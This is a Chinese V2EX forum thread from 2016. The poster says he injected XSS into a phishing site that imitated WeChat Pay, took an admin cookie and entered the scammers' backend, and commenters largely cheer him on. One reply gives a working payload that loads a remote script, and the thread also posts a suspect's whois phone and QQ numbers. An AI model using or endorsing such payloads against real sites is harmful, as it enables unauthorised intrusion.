首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
拉钩
V2EX  ›  微信

腾讯内部是不是有内鬼啊,刚刚申请了微信支付,结果就发来诈骗短信

  •  4
     
  •   TangMonk · 2016-12-20 13:54:12 +08:00 · 13601 次点击
    这是一个创建于 726 天前的主题,其中的信息可能已经有所发展或是发生改变。

    昨天在微信官网上申请微信支付,今天下午就收到了一条短信

    于是我就点开了这个链接,发现是 asp 后缀的,腾讯应该搞 php 的啊,我于是就发现有点不对头,我就往里面来了一发 xss 代码。

    不一会儿就搞到了 cookie, 登录后台一看。。

    第 1 条附言  ·  2016-12-21 09:38:42 +08:00
    各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:

    移动的短信详单:



    我的手机收到的短信:
    (我的手机还"智能"的给短信加了 logo )
    106 回复  |  直到 2016-12-22 21:48:21 +08:00
    1  2  
        1
    Showfom   2016-12-20 13:56:44 +08:00 via iPhone
    只能说有些人太好骗了
        2
    SourceMan   2016-12-20 13:57:22 +08:00
    火钳刘明
    这个是大新闻
        3
    kimwang   2016-12-20 14:00:31 +08:00
    "放蛇“(钓鱼执法) ……
        4
    TangMonk   2016-12-20 14:00:34 +08:00   ♥ 102
    我现在已经把上面被盗的信息全部给他删完了。。
        5
    icodesign   2016-12-20 14:01:17 +08:00
    取款密码......
        6
    HGladIator   2016-12-20 14:02:47 +08:00 via iPhone
    第一眼就看到了域名错误。
        7
    TangMonk   2016-12-20 14:04:34 +08:00
    查了下 whois ,貌似是在上海祥和路,电话: 0215822656 , qq: 395849573958
        8
    HFX3389   2016-12-20 14:05:37 +08:00
    我只说两个字,求教。
        9
    HFX3389   2016-12-20 14:06:11 +08:00
    @TangMonk 这是蛇皮 QQ 。现在的新 QQ 都这么长了啊。。。。
        10
    sorcerer   2016-12-20 14:08:57 +08:00 via iPhone
    😂他在哪个页面中了你的 xss
        11
    mrjoel   2016-12-20 14:15:11 +08:00
    所以说啊,还是老老实实用 PHP
        12
    TangMonk   2016-12-20 14:16:20 +08:00
    @sorcerer 输入手机号的页面啊。。。
        13
    lyragosa   2016-12-20 14:16:38 +08:00
    转型 php 最好语言贴……
        14
    815lbh   2016-12-20 14:28:35 +08:00
    大哥,受我一拜,好人啊。(。・∀・)ノ゙
        15
    TangMonk   2016-12-20 14:29:25 +08:00
        16
    hlg002   2016-12-20 14:36:08 +08:00
    求教程
        17
    wenymedia   2016-12-20 14:40:54 +08:00 via Android
    楼主干的漂亮
    感觉把对方服务器肉鸡了
    或者重定向到某榴… 更刺鸡
        18
    TangMonk   2016-12-20 14:41:31 +08:00
    @hlg002 https://www.google.com/search?q=xss+%E6%95%99%E7%A8%8B&{google:acceptedSuggestion}oq=xss+%E6%95%99%E7%A8%8B&aqs=chrome..69i57.2076j0j7&sourceid=chrome&ie=UTF-8
        19
    hnnxn   2016-12-20 14:44:16 +08:00 via Android
    楼主好人
        20
    x86   2016-12-20 14:47:22 +08:00   ♥ 1
    php 我学还不行吗
        21
    hlg002   2016-12-20 14:48:03 +08:00
    @TangMonk 我在 inpuit 输入 <script>alert(123);</script> 和 get 都不行
        22
    zhang1215   2016-12-20 14:51:00 +08:00
    楼主 666 ,再低劣的骗术也有人中招
        23
    phieo   2016-12-20 14:53:51 +08:00
    顶楼主 现在社会需要你这样正直的人
        24
    baiyi   2016-12-20 14:54:00 +08:00
    @hlg002 你输入了以后就提交上去了,如过真的有漏洞,就是在他的管理页面会弹出`123`了
        25
    TangMonk   2016-12-20 14:54:12 +08:00
    @hlg002 那可能是对 script 标签过滤了吧
        26
    KenGe   2016-12-20 15:00:57 +08:00
    你用了 wifi 没还是用的自己的网络?
        27
    asdwddd   2016-12-20 15:01:55 +08:00
    大家跟进看什么原因
        28
    TangMonk   2016-12-20 15:02:29 +08:00
    @KenGe 用的 wifi, 怎么了?
        29
    KenGe   2016-12-20 15:06:26 +08:00
    @TangMonk 自己检查下吧~ 先别下定义
        30
    CerealKiller   2016-12-20 15:09:40 +08:00 via iPhone
    看网址 应该能看出不对头……学习了
        31
    Felldeadbird   2016-12-20 15:14:40 +08:00
    哈哈,骗子反被楼主骗了。
    骗子:哼哼哼,骗子!
        32
    jiangzhuo   2016-12-20 15:23:14 +08:00
    95017 确实是腾讯的客服电话吧。城里套路真是深啊
        33
    marsLeo   2016-12-20 15:33:08 +08:00
    如果你在收到短信前,有短时间手机突然没信号,那有可能是伪基站发的短信。
        34
    jacy   2016-12-20 16:05:41 +08:00
    数据库挂了还是本来就会错误
        35
    mgna17   2016-12-20 16:08:01 +08:00 via iPhone
    Microsoft JET Database Engine 错误 '80004005'

    未指定的错误

    /include/db_conn.asp ,行 36




    他的数据库被人玩坏了。。。
        36
    tumbzzc   2016-12-20 16:13:44 +08:00
    @TangMonk good job
        37
    subpo   2016-12-20 16:16:50 +08:00
    问题是...95017 确实是微信的客服号码,这个怎么弄的?
        38
    itqls   2016-12-20 16:32:42 +08:00
    @subpo 基站伪装呀....以前电信诈骗的时候,各种短信都是银行的号
        39
    wenymedia   2016-12-20 16:50:48 +08:00 via Android
    @mgna17 随手注入 健康你我他…
        40
    xdeng   2016-12-20 17:15:00 +08:00
    @itqls 哪有这么巧? 知道了住址,还要连夜赶过去?
        41
    smallaccount   2016-12-20 17:21:24 +08:00
    楼主做了一件大好事。
        42
    WhyAreYouSoSad   2016-12-20 17:25:14 +08:00   ♥ 3
    马云:祝各位阿 sir 在警察部一帆风顺。干杯!
        43
    hack   2016-12-20 17:49:05 +08:00 via Android
    太暴力,后台登录挂个网马撸出来照片或者视频最好
        44
    hahiru   2016-12-20 17:49:53 +08:00 via Android
    伪基站的话应该是撒网捞鱼的。碰巧遇到楼主,腾讯背了锅。
        45
    xdeng   2016-12-20 17:52:10 +08:00
    @hahiru 那还不如撒 银行的网
        46
    xdeng   2016-12-20 17:52:37 +08:00
    @hahiru 科技园区 有可能
        47
    f1r1ng   2016-12-20 18:01:27 +08:00
    是不是手机里软件有问题。。
        48
    dreamwar   2016-12-20 18:08:38 +08:00
    基站伪装
        49
    mringg   2016-12-20 18:16:52 +08:00 via iPhone
    这个重点不是内鬼麼
        50
    dahvlh   2016-12-20 18:19:59 +08:00
    = =,伪基站 去科技园撒网 专门调微信开发者... 这不太现实吧 而且注册也就一次的事情

    得到微信内部查查是谁卖的了
        51
    basefas   2016-12-20 18:29:38 +08:00 via iPhone
    没有人吐槽“登陆”的么(滑稽)
        52
    wph95   2016-12-20 18:36:26 +08:00
    @dahvlh
    感觉更不现实的是
    知道你刚 申请微信支付 ,拿到你的 地址,跑到你身边架一个伪基站,恰好你又能收到
        53
    nfroot   2016-12-20 18:39:51 +08:00
    @basefas 这货跟我一样,登陆和登录拼音输入法打出哪个用哪个……而且后台没过滤 XSS (我也是填表的时候做过滤……) 看来后台做个防止载入其他站点资源的那个功能是完全有必要的,我以前也想到说如果别人 XSS 我后台……后台地址藏好了也随时暴露……
        54
    nfroot   2016-12-20 18:40:38 +08:00
    @wenymedia 1024 的这个好,帮我刷点贡献吧……
        55
    ahkxhyl   2016-12-20 18:44:19 +08:00
    我去 贴主~很屌 知道放 xss~~ 不仔细看 真的以为是腾讯发来的~~
        56
    wenymedia   2016-12-20 18:47:10 +08:00 via Android
    @nfroot 嘘 不要走漏了风声
        57
    zhouyg   2016-12-20 18:53:48 +08:00
    牛掰,果然 php 才是王道。
        58
    TangMonk   2016-12-20 19:06:17 +08:00 via Android
    @zhouyg 我要来推广下 ruby , 哈哈
        59
    Patrick95   2016-12-20 19:07:03 +08:00
    应该是伪基站群发了短信,恰好赶上你微信支付了。
        60
    TimePPT   2016-12-20 19:10:56 +08:00 via iPhone
    围观
        61
    TangMonk   2016-12-20 19:14:05 +08:00 via Android
    @Patrick95 但是我周围的朋友没有收到短信
        62
    NaturalColour   2016-12-20 19:31:29 +08:00
    厉害了我的楼主
        63
    Quaintjade   2016-12-20 19:51:29 +08:00 via Android
    可以查一下详单来分辨是不是伪基站,注意短彩信和增值业务都要查,因为有些增值业务也能发短信。
        64
    cwz326237076   2016-12-20 19:52:02 +08:00 via Android
    wap.weixtqq.com 这不摆明说是假的么
        65
    ahkxhyl   2016-12-20 19:59:38 +08:00
    层主说的对 感觉有点像伪基站发的~~
        66
    j8sec   2016-12-20 20:27:26 +08:00   ♥ 1
    腾讯企业验证费用和验证是交给第三方做的, 这个第三方有重大嫌疑
        67
    TangMonk   2016-12-20 20:33:42 +08:00
    @j8sec 原来如此!什么公司啊?
        68
    terence4444   2016-12-20 20:34:10 +08:00 via iPhone
    过两天去查详单 看看到底是不是伪基站
        69
    wclebb   2016-12-20 20:37:36 +08:00 via iPhone
    申请微信支付有可能不是腾讯,而是第三方审核所在的公司。
        70
    Tink   2016-12-20 20:43:14 +08:00
    强,无敌!
        71
    shingoxray   2016-12-20 20:48:28 +08:00
    Good job !事关广大人民群众安全,建议向当地公安报案,并向腾讯安全应急响应中心报告。
        72
    RobertYang   2016-12-20 21:58:44 +08:00 via Android
    哈哈哈 干的漂亮
        73
    Aidea   2016-12-20 22:58:12 +08:00
    厉害,自己还是要加强学习啊~
        74
    gotonba   2016-12-20 23:53:53 +08:00
    难怪现在可以通过对公账户打款来验证,看来第三方确实不安全,还得交 300 大洋=。=
        75
    jedihy   2016-12-20 23:55:14 +08:00 via iPhone
    能不能写写入侵流程
        76
    jookr   2016-12-21 00:52:36 +08:00
    [建议]
    1 、用个插件自定义你的 UA (例如插入几个字符),大家写后台的时候在统一入口验证 UA 如果不包含那几个字符就 404 ,这样能防止 XSS 。 https://ext.se.360.cn/webstore/search/魔变
    2 、 session 保存登录的 ip ,每个后台页面打开都判断当前 IP 是否等于登录时记得那个 IP 。

    求还有什么方法或者更简便的方法防止被 XSS
        77
    onionnews   2016-12-21 08:49:41 +08:00 via Android
    如果是伪基站的话,怎么知道谁刚刚开通微信支付,刚好受害者周围部署了伪基站?
        78
    lxrmido   2016-12-21 08:55:55 +08:00
    说起伪基站,大学时有一阵子只要发查询剩余流量的短信(移动卡)就会收到电信上网卡的推销短信……
        79
    lxlgod   2016-12-21 09:19:22 +08:00
    @TangMonk 厉害的。。。
        80
    TangMonk   2016-12-21 09:34:45 +08:00
    楼上的各位,应该是伪基站发送的,我查了下移动的短信详单, 没有 95017 的电话号码:

    移动的短信详单:

    我的手机收到的短信: (我的手机还"智能"的给短信加了 logo )
        81
    Ouyangan   2016-12-21 09:36:19 +08:00
    @jookr 对输入的字符中的特殊字符进行转义 . 配置统一的过滤层 .
        82
    sola97   2016-12-21 09:44:32 +08:00
    有没有 xss 代码供学习一下
        83
    tairan2006   2016-12-21 10:10:55 +08:00
    楼主好样的,佩服
        84
    hoythan   2016-12-21 10:17:16 +08:00
    能不能提供一下你的 xss 代码学习一下.
        85
    mazyi   2016-12-21 10:25:30 +08:00
    厉害啊厉害,随手注入了一下~
        86
    TangMonk   2016-12-21 10:27:00 +08:00   ♥ 1
        87
    TangMonk   2016-12-21 10:32:24 +08:00
    @TangMonk 这个 xss 代码也是我抄别人的。。 :(
        88
    BakCshi   2016-12-21 10:32:25 +08:00
    去知乎发个帖,搞个大新闻
        89
    nevermlnd   2016-12-21 10:36:57 +08:00
    如果是 iPhone 的截图 回更有说服力
        90
    ljcarsenal   2016-12-21 11:17:29 +08:00
    @TangMonk 你这个代码直接通过用户名输入框输入进去的? 服务端和网页限制一下输入长度是不是就没用了
        91
    TangMonk   2016-12-21 11:28:39 +08:00
    @ljcarsenal 不是,这只是一个 js 链接包含的内容而已,输入框里面填写

    <img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的 js 地址';>
        92
    wavingclear   2016-12-21 12:15:57 +08:00 via iPad
    应该是伪基站,想骗普通吃瓜群众,骗到程序员是因为他倒霉
        93
    sutking   2016-12-21 12:21:36 +08:00 via iPhone
    第一眼就发现域名有问题啊
        94
    sutking   2016-12-21 12:24:05 +08:00 via iPhone
    你看这 whois ,绝对坑你没商量
        95
    yamen   2016-12-21 13:12:01 +08:00
    我不懂,但我觉得你用的是安卓吧?
        96
    fengjianxinghun   2016-12-21 13:15:28 +08:00
    nice !干得不错
        97
    choury   2016-12-21 13:22:45 +08:00
    这个是针对个人的微信支付来诈骗的吧,任何人收到都可能受骗啊,基本有微信的都开了微信支付吧,只是你收到短信的时间比较巧吧
        98
    zhangsimon   2016-12-21 13:37:33 +08:00
    你的手机什么 rom !!! 太干扰人了
        99
    TangMonk   2016-12-21 13:42:23 +08:00
    @zhangsimon 一加 2 。。氢 os
        100
    samtoto   2016-12-21 13:50:12 +08:00
    next page>
    1  2  
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   2122 人在线   最高记录 4019   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.1 · 42ms · UTC 08:16 · PVG 16:16 · LAX 00:16 · JFK 03:16
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1